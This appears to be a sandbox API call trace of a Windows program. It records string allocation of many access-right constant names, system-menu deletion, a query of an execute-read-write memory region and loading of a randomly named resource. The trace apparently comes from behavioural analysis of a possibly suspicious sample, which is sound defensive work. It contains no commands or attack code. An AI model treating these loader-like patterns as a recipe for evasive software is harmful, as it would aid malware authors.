[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e480*=0x0, psz="PROCESS_SET_INFORMATION", len=0x17 | out: pbstr=0x2a3e480*="PROCESS_SET_INFORMATION") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e470*=0x0, psz="PROCESS_SET_QUOTA", len=0x11 | out: pbstr=0x2a3e470*="PROCESS_SET_QUOTA") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e460*=0x0, psz="PROCESS_CREATE_PROCESS", len=0x16 | out: pbstr=0x2a3e460*="PROCESS_CREATE_PROCESS") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e450*=0x0, psz="PROCESS_DUP_HANDLE", len=0x12 | out: pbstr=0x2a3e450*="PROCESS_DUP_HANDLE") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e440*=0x0, psz="PROCESS_VM_WRITE", len=0x10 | out: pbstr=0x2a3e440*="PROCESS_VM_WRITE") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e430*=0x0, psz="PROCESS_VM_READ", len=0xf | out: pbstr=0x2a3e430*="PROCESS_VM_READ") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e420*=0x0, psz="PROCESS_VM_OPERATION", len=0x14 | out: pbstr=0x2a3e420*="PROCESS_VM_OPERATION") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e410*=0x0, psz="PROCESS_SET_SESSIONID", len=0x15 | out: pbstr=0x2a3e410*="PROCESS_SET_SESSIONID") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e400*=0x0, psz="PROCESS_CREATE_THREAD", len=0x15 | out: pbstr=0x2a3e400*="PROCESS_CREATE_THREAD") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e3f0*=0x0, psz="PROCESS_TERMINATE", len=0x11 | out: pbstr=0x2a3e3f0*="PROCESS_TERMINATE") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e3e0*=0x0, psz="PROCESS_ALL_ACCESS", len=0x12 | out: pbstr=0x2a3e3e0*="PROCESS_ALL_ACCESS") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e3d0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e3d0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e3c0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e3c0*="STANDARD_RIGHTS_WRITE") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e3b0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e3b0*="STANDARD_RIGHTS_READ") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e3a0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e3a0*="STANDARD_RIGHTS_ALL") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e390*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e390*="DELETE") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e380*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e380*="READ_CONTROL") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e370*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e370*="WRITE_OWNER") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e360*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e360*="WRITE_DAC") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e350*=0x0, psz="PERM_FILE_CREATE", len=0x10 | out: pbstr=0x2a3e350*="PERM_FILE_CREATE") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e340*=0x0, psz="PERM_FILE_WRITE", len=0xf | out: pbstr=0x2a3e340*="PERM_FILE_WRITE") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e330*=0x0, psz="PERM_FILE_READ", len=0xe | out: pbstr=0x2a3e330*="PERM_FILE_READ") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e320*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e320*="STANDARD_RIGHTS_EXECUTE") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e310*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e310*="STANDARD_RIGHTS_WRITE") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e300*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e300*="STANDARD_RIGHTS_READ") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e2f0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e2f0*="STANDARD_RIGHTS_ALL") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e2e0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e2e0*="DELETE") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e2d0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e2d0*="READ_CONTROL") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e2c0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e2c0*="WRITE_OWNER") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e2b0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e2b0*="WRITE_DAC") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e2a0*=0x0, psz="JOB_ACCESS_ADMINISTER", len=0x15 | out: pbstr=0x2a3e2a0*="JOB_ACCESS_ADMINISTER") returned 1
[0179.795] SysReAllocStringLen (in: pbstr=0x2a3e290*=0x0, psz="PRINTER_ACCESS_USE", len=0x12 | out: pbstr=0x2a3e290*="PRINTER_ACCESS_USE") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e280*=0x0, psz="PRINTER_ACCESS_ADMINISTER", len=0x19 | out: pbstr=0x2a3e280*="PRINTER_ACCESS_ADMINISTER") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e270*=0x0, psz="SERVER_ACCESS_ENUMERATE", len=0x17 | out: pbstr=0x2a3e270*="SERVER_ACCESS_ENUMERATE") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e260*=0x0, psz="SERVER_ACCESS_ADMINISTER", len=0x18 | out: pbstr=0x2a3e260*="SERVER_ACCESS_ADMINISTER") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e250*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2a3e250*="PRINTER_ALL_ACCESS") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e240*=0x0, psz="PRINTER_EXECUTE", len=0xf | out: pbstr=0x2a3e240*="PRINTER_EXECUTE") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e230*=0x0, psz="PRINTER_WRITE", len=0xd | out: pbstr=0x2a3e230*="PRINTER_WRITE") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e220*=0x0, psz="PRINTER_READ", len=0xc | out: pbstr=0x2a3e220*="PRINTER_READ") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e210*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2a3e210*="PRINTER_ALL_ACCESS") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e200*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e200*="DELETE") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e1f0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e1f0*="READ_CONTROL") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e1e0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e1e0*="WRITE_OWNER") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e1d0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e1d0*="WRITE_DAC") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e1c0*=0x0, psz="SC_MANAGER_QUERY_LOCK_STATUS", len=0x1c | out: pbstr=0x2a3e1c0*="SC_MANAGER_QUERY_LOCK_STATUS") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e1b0*=0x0, psz="SC_MANAGER_MODIFY_BOOT_CONFIG", len=0x1d | out: pbstr=0x2a3e1b0*="SC_MANAGER_MODIFY_BOOT_CONFIG") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e1a0*=0x0, psz="SC_MANAGER_LOCK", len=0xf | out: pbstr=0x2a3e1a0*="SC_MANAGER_LOCK") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e190*=0x0, psz="SC_MANAGER_ENUMERATE_SERVICE", len=0x1c | out: pbstr=0x2a3e190*="SC_MANAGER_ENUMERATE_SERVICE") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e180*=0x0, psz="SC_MANAGER_CONNECT", len=0x12 | out: pbstr=0x2a3e180*="SC_MANAGER_CONNECT") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e170*=0x0, psz="SC_MANAGER_CREATE_SERVICE", len=0x19 | out: pbstr=0x2a3e170*="SC_MANAGER_CREATE_SERVICE") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e160*=0x0, psz="SC_MANAGER_ALL_ACCESS", len=0x15 | out: pbstr=0x2a3e160*="SC_MANAGER_ALL_ACCESS") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e150*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e150*="STANDARD_RIGHTS_EXECUTE") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e140*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e140*="STANDARD_RIGHTS_WRITE") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e130*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e130*="STANDARD_RIGHTS_READ") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e120*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e120*="STANDARD_RIGHTS_ALL") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e110*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3e110*="DELETE") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e100*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3e100*="READ_CONTROL") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e0f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3e0f0*="WRITE_OWNER") returned 1
[0179.796] SysReAllocStringLen (in: pbstr=0x2a3e0e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3e0e0*="WRITE_DAC") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3e0d0*=0x0, psz="SERVICE_USER_DEFINED_CONTROL", len=0x1c | out: pbstr=0x2a3e0d0*="SERVICE_USER_DEFINED_CONTROL") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3e0c0*=0x0, psz="SERVICE_STOP", len=0xc | out: pbstr=0x2a3e0c0*="SERVICE_STOP") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3e0b0*=0x0, psz="SERVICE_START", len=0xd | out: pbstr=0x2a3e0b0*="SERVICE_START") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3e0a0*=0x0, psz="SERVICE_QUERY_STATUS", len=0x14 | out: pbstr=0x2a3e0a0*="SERVICE_QUERY_STATUS") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3e090*=0x0, psz="SERVICE_QUERY_CONFIG", len=0x14 | out: pbstr=0x2a3e090*="SERVICE_QUERY_CONFIG") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3e080*=0x0, psz="SERVICE_PAUSE_CONTINUE", len=0x16 | out: pbstr=0x2a3e080*="SERVICE_PAUSE_CONTINUE") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3e070*=0x0, psz="SERVICE_INTERROGATE", len=0x13 | out: pbstr=0x2a3e070*="SERVICE_INTERROGATE") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3e060*=0x0, psz="SERVICE_ENUMERATE_DEPENDENTS", len=0x1c | out: pbstr=0x2a3e060*="SERVICE_ENUMERATE_DEPENDENTS") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3e050*=0x0, psz="SERVICE_CHANGE_CONFIG", len=0x15 | out: pbstr=0x2a3e050*="SERVICE_CHANGE_CONFIG") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3e040*=0x0, psz="SERVICE_ALL_ACCESS", len=0x12 | out: pbstr=0x2a3e040*="SERVICE_ALL_ACCESS") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3e030*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3e030*="STANDARD_RIGHTS_EXECUTE") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3e020*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3e020*="STANDARD_RIGHTS_WRITE") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3e010*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3e010*="STANDARD_RIGHTS_READ") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3e000*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3e000*="STANDARD_RIGHTS_ALL") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3dff0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3dff0*="DELETE") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3dfe0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3dfe0*="READ_CONTROL") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3dfd0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3dfd0*="WRITE_OWNER") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3dfc0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3dfc0*="WRITE_DAC") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3dfb0*=0x0, psz="KEY_SET_VALUE", len=0xd | out: pbstr=0x2a3dfb0*="KEY_SET_VALUE") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3dfa0*=0x0, psz="KEY_CREATE_LINK", len=0xf | out: pbstr=0x2a3dfa0*="KEY_CREATE_LINK") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3df90*=0x0, psz="KEY_CREATE_SUB_KEY", len=0x12 | out: pbstr=0x2a3df90*="KEY_CREATE_SUB_KEY") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3df80*=0x0, psz="KEY_NOTIFY", len=0xa | out: pbstr=0x2a3df80*="KEY_NOTIFY") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3df70*=0x0, psz="KEY_ENUMERATE_SUB_KEYS", len=0x16 | out: pbstr=0x2a3df70*="KEY_ENUMERATE_SUB_KEYS") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3df60*=0x0, psz="KEY_QUERY_VALUE", len=0xf | out: pbstr=0x2a3df60*="KEY_QUERY_VALUE") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3df50*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3df50*="STANDARD_RIGHTS_EXECUTE") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3df40*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3df40*="STANDARD_RIGHTS_WRITE") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3df30*=0x0, psz="STANDARD_RIGHTS_READ 2", len=0x16 | out: pbstr=0x2a3df30*="STANDARD_RIGHTS_READ 2") returned 1
[0179.797] SysReAllocStringLen (in: pbstr=0x2a3df20*=0x0, psz="STANDARD_RIGHTS_ALL 1", len=0x15 | out: pbstr=0x2a3df20*="STANDARD_RIGHTS_ALL 1") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3df10*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3df10*="DELETE") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3df00*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3df00*="READ_CONTROL") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3def0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3def0*="WRITE_OWNER") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3dee0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3dee0*="WRITE_DAC") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3ded0*=0x0, psz="DESKTOP_SWITCHDESKTOP", len=0x15 | out: pbstr=0x2a3ded0*="DESKTOP_SWITCHDESKTOP") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3dec0*=0x0, psz="DESKTOP_WRITEOBJECTS", len=0x14 | out: pbstr=0x2a3dec0*="DESKTOP_WRITEOBJECTS") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3deb0*=0x0, psz="DESKTOP_JOURNALRECORD", len=0x15 | out: pbstr=0x2a3deb0*="DESKTOP_JOURNALRECORD") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3dea0*=0x0, psz="DESKTOP_JOURNALPLAYBACK", len=0x17 | out: pbstr=0x2a3dea0*="DESKTOP_JOURNALPLAYBACK") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3de90*=0x0, psz="DESKTOP_HOOKCONTROL", len=0x13 | out: pbstr=0x2a3de90*="DESKTOP_HOOKCONTROL") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3de80*=0x0, psz="DESKTOP_CREATEWINDOW", len=0x14 | out: pbstr=0x2a3de80*="DESKTOP_CREATEWINDOW") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3de70*=0x0, psz="DESKTOP_CREATEMENU", len=0x12 | out: pbstr=0x2a3de70*="DESKTOP_CREATEMENU") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3de60*=0x0, psz="DESKTOP_READOBJECTS", len=0x13 | out: pbstr=0x2a3de60*="DESKTOP_READOBJECTS") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3de50*=0x0, psz="DESKTOP_ENUMERATE", len=0x11 | out: pbstr=0x2a3de50*="DESKTOP_ENUMERATE") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3de40*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3de40*="STANDARD_RIGHTS_EXECUTE") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3de30*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3de30*="STANDARD_RIGHTS_WRITE") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3de20*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3de20*="STANDARD_RIGHTS_READ") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3de10*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a3de10*="STANDARD_RIGHTS_ALL") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3de00*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a3de00*="DELETE") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3ddf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3ddf0*="READ_CONTROL") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3dde0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a3dde0*="WRITE_OWNER") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3ddd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3ddd0*="WRITE_DAC") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3ddc0*=0x0, psz="WINSTA_WRITEATTRIBUTES", len=0x16 | out: pbstr=0x2a3ddc0*="WINSTA_WRITEATTRIBUTES") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3ddb0*=0x0, psz="WINSTA_READSCREEN", len=0x11 | out: pbstr=0x2a3ddb0*="WINSTA_READSCREEN") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3dda0*=0x0, psz="WINSTA_READATTRIBUTES", len=0x15 | out: pbstr=0x2a3dda0*="WINSTA_READATTRIBUTES") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3dd90*=0x0, psz="WINSTA_EXITWINDOWS", len=0x12 | out: pbstr=0x2a3dd90*="WINSTA_EXITWINDOWS") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3dd80*=0x0, psz="WINSTA_ENUMERATE", len=0x10 | out: pbstr=0x2a3dd80*="WINSTA_ENUMERATE") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3dd70*=0x0, psz="WINSTA_ENUMDESKTOPS", len=0x13 | out: pbstr=0x2a3dd70*="WINSTA_ENUMDESKTOPS") returned 1
[0179.798] SysReAllocStringLen (in: pbstr=0x2a3dd60*=0x0, psz="WINSTA_CREATEDESKTOP", len=0x14 | out: pbstr=0x2a3dd60*="WINSTA_CREATEDESKTOP") returned 1
[0179.799] SysReAllocStringLen (in: pbstr=0x2a3dd50*=0x0, psz="WINSTA_ACCESSGLOBALATOMS", len=0x18 | out: pbstr=0x2a3dd50*="WINSTA_ACCESSGLOBALATOMS") returned 1
[0179.799] SysReAllocStringLen (in: pbstr=0x2a3dd40*=0x0, psz="WINSTA_ACCESSCLIPBOARD", len=0x16 | out: pbstr=0x2a3dd40*="WINSTA_ACCESSCLIPBOARD") returned 1
[0179.799] SysReAllocStringLen (in: pbstr=0x2a3dd30*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a3dd30*="STANDARD_RIGHTS_EXECUTE") returned 1
[0179.799] SysReAllocStringLen (in: pbstr=0x2a3dd20*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a3dd20*="STANDARD_RIGHTS_WRITE") returned 1
[0179.799] SysReAllocStringLen (in: pbstr=0x2a3dd10*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a3dd10*="STANDARD_RIGHTS_READ") returned 1
[0179.799] SysReAllocStringLen (in: pbstr=0x2a3dd00*=0x0, psz="STANDARD_RIGHTS_REQUIRED", len=0x18 | out: pbstr=0x2a3dd00*="STANDARD_RIGHTS_REQUIRED") returned 1
[0179.799] SysReAllocStringLen (in: pbstr=0x2a3dcf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a3dcf0*="READ_CONTROL") returned 1
[0179.799] SysReAllocStringLen (in: pbstr=0x2a3dce0*=0x0, psz="SI_ACCESS_SPECIFIC", len=0x12 | out: pbstr=0x2a3dce0*="SI_ACCESS_SPECIFIC") returned 1
[0179.800] SysReAllocStringLen (in: pbstr=0x2a3dcd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a3dcd0*="WRITE_DAC") returned 1
[0179.800] SysReAllocStringLen (in: pbstr=0x2a3dcc0*=0x0, psz="FILE_DELETE", len=0xb | out: pbstr=0x2a3dcc0*="FILE_DELETE") returned 1
[0179.800] SysReAllocStringLen (in: pbstr=0x2a3dcb0*=0x0, psz="FILE_DELETE_CHILD", len=0x11 | out: pbstr=0x2a3dcb0*="FILE_DELETE_CHILD") returned 1
[0179.801] SetClassLongA (hWnd=0xd01de, nIndex=-14, dwNewLong=65575) returned 0x0
[0179.801] GetSystemMenu (hWnd=0xd01de, bRevert=0) returned 0xc01e7
[0179.801] DeleteMenu (hMenu=0xc01e7, uPosition=0xf030, uFlags=0x0) returned 1
[0179.801] DeleteMenu (hMenu=0xc01e7, uPosition=0xf000, uFlags=0x0) returned 1
[0179.801] DeleteMenu (hMenu=0xc01e7, uPosition=0xf010, uFlags=0x0) returned 1
[0179.801] GetCurrentThreadId () returned 0x3d8
[0179.801] ResetEvent (hEvent=0xa0) returned 1
[0179.801] GetCurrentThreadId () returned 0x3d8
[0179.801] GetCurrentThreadId () returned 0x3d8
[0179.801] GetCurrentThreadId () returned 0x3d8
[0179.802] ResetEvent (hEvent=0xa0) returned 1
[0179.802] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x20f3c4, fWinIni=0x0 | out: pvParam=0x20f3c4) returned 1
[0179.802] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x20f3c4, fWinIni=0x0 | out: pvParam=0x20f3c4) returned 1
[0179.802] GetSystemMetrics (nIndex=49) returned 16
[0179.802] GetSystemMetrics (nIndex=50) returned 16
[0179.802] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x20f40c, fWinIni=0x0 | out: pvParam=0x20f40c) returned 1
[0179.802] IsWindowVisible (hWnd=0xd01de) returned 0
[0179.802] GetCurrentThreadId () returned 0x3d8
[0179.802] VirtualQuery (in: lpAddress=0x2a11668, lpBuffer=0x20f2dc, dwLength=0x1c | out: lpBuffer=0x20f2dc*(BaseAddress=0x2a11000, AllocationBase=0x2950000, AllocationProtect=0x40, RegionSize=0x52000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c
[0179.803] FindResourceA (hModule=0x2950000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2a58990
[0179.803] FindResourceA (hModule=0x2950000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2a58990
[0179.803] LoadResource (hModule=0x2950000, hResInfo=0x2a58990) returned 0x2a5f044
[0179.803] SizeofResource (hModule=0x2950000, hResInfo=0x2a58990) returned 0xca5
[0179.803] LockResource (hResData=0x2a5f044) returned 0x2a5f044
[0179.803] GetCurrentThreadId () returned 0x3d8
[0179.803] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x20f090, fWinIni=0x0 | out: pvParam=0x20f090) returned 1
[0179.803] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x20f090, fWinIni=0x0 | out: pvParam=0x20f090) returned 1
[0179.803] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x20f090, fWinIni=0x0 | out: pvParam=0x20f090) returned 1
[0179.803] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x20f090, fWinIni=0x0 | out: pvParam=0x20f090) returned 1
[0179.804] GetDC (hWnd=0x0) returned 0x23010850
[0179.804] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f074 | out: lptm=0x20f074) returned 1
[0179.804] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3
[0179.805] CreateFontIndirectA (lplf=0x20f02c) returned 0x270a0868
[0179.805] SelectObject (hdc=0x23010850, h=0x270a0868) returned 0x18a002e
[0179.805] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f0ac | out: lptm=0x20f0ac) returned 1
[0179.805] SelectObject (hdc=0x23010850, h=0x18a002e) returned 0x270a0868
[0179.805] ReleaseDC (hWnd=0x0, hDC=0x23010850) returned 1
[0179.805] GetSystemMetrics (nIndex=6) returned 1
[0179.806] VirtualAlloc (lpAddress=0x2a74000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a74000
[0179.806] GetDC (hWnd=0x0) returned 0x23010850
[0179.806] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f074 | out: lptm=0x20f074) returned 1
[0179.806] SelectObject (hdc=0x23010850, h=0x270a0868) returned 0x18a002e
[0179.806] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f0ac | out: lptm=0x20f0ac) returned 1
[0179.806] SelectObject (hdc=0x23010850, h=0x18a002e) returned 0x270a0868
[0179.806] ReleaseDC (hWnd=0x0, hDC=0x23010850) returned 1
[0179.806] GetSystemMetrics (nIndex=6) returned 1
[0179.806] GetDC (hWnd=0x0) returned 0x23010850
[0179.806] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f074 | out: lptm=0x20f074) returned 1
[0179.807] SelectObject (hdc=0x23010850, h=0x270a0868) returned 0x18a002e
[0179.807] GetTextMetricsA (in: hdc=0x23010850, lptm=0x20f0ac | out: lptm=0x20f0ac) returned 1
[0179.807] SelectObject (hdc=0x23010850, h=0x18a002e) returned 0x270a0868
[0179.807] ReleaseDC (hWnd=0x0, hDC=0x23010850) returned 1
[0179.807] GetSystemMetrics (nIndex=6) returned 1
[0179.807] GetDC (hWnd=0x0) returned 0x23010850
